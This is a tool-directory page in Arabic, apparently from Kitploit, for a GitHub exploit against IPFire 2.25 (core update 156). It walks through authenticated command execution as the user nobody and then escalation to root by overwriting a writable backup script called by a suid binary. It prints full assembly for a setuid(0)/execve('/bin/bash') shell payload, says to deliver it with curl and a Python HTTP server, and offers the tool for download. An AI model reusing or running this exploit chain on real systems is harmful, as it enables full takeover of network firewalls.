Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
ipfire-2-25-auth-rce — ipfire 2.25 authenticated remote code execution | Kitploit
أدوات/GitHubGitHub/kaanaryoverflow/ipfire-2-25-auth-rce
Privilege EscalationVulnerability AnalysisExploitationWeb Application ExploitationPayload DevelopmentBinary Exploitation
GitHubkaanaryoverflow/ipfire-2-25-auth-rce

ipfire-2-25-auth-rce

ipfire 2.25 authenticated remote code execution

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
2منذ 5 سنواتلم تتم المراجعة بعد

Ipfire 2-25 (core update 156) تنفيذ أوامر عن بُعد بعد المصادقة

  • تشغيل أمر على النظام عند تثبيت أي حزمة

packfileinstallation

  • النظام يجلب 7zip من مجرد html

pocpc0

  • ثم تحقق من مجلد tmp

pocpc1

  • الإصدار 2.25 - core update 156

version

  • يتيح Ipfire تنفيذ أوامر نظام عشوائية بصلاحيات المستخدم nobody بعد تسجيل الدخول

كن root!

  • افحص ملفات suid الثنائية

find-suid

  • برنامج النسخ الاحتياطي يشغّل سكربتًا آخر. /var/ipfire/backup/bin/backup.pl (إنه سكربت bash وصلاحياته تبدو جيدة)

backup-tespiti

  • جرّب الكتابة في سكربت bash. (لا يوجد خطأ. ممتاز!)

yazma-denemesi

  • جرّب تشغيل bash

yazabilme-kanıtı

  • نعم. يمكننا تشغيله لكن بصلاحيات منخفضة. يجب أن نُطلق setuid(0)!
  • احفظ هذا وشغّل alti name.asm q
  • alti هو برنامج التحقق من الترجمة الخاص بي في مستودع soo_deep.
root@kitploit:~
bits 64
section .data
  string db "/bin/bash",0x00
  olmadis db "basarisiz.",0x0a,0x00
  olmadil equ $-olmadis
section .text
  global main
main:
  mov rax,105
  mov rdi,0
  syscall
  cmp rax,0
  je getbash

  mov rax,1
  mov rdi,1
  mov rsi,olmadis
  mov rdx,olmadil
  syscall

  mov rax,60
  xor rdi,rdi
  syscall

getbash:
  mov rax,59
  mov rdi,string
  mov rsi,0
  mov rdx,0
  syscall
  • ثم اكتب البرنامج الجديد إلى /var/ipfire/backup/bin/backup.pl. (يمكننا استخدام خادم http الخاص بـ python وأمر curl للكتابة)

  • واستمتع بصدفة root!

image

تنزيل الأداة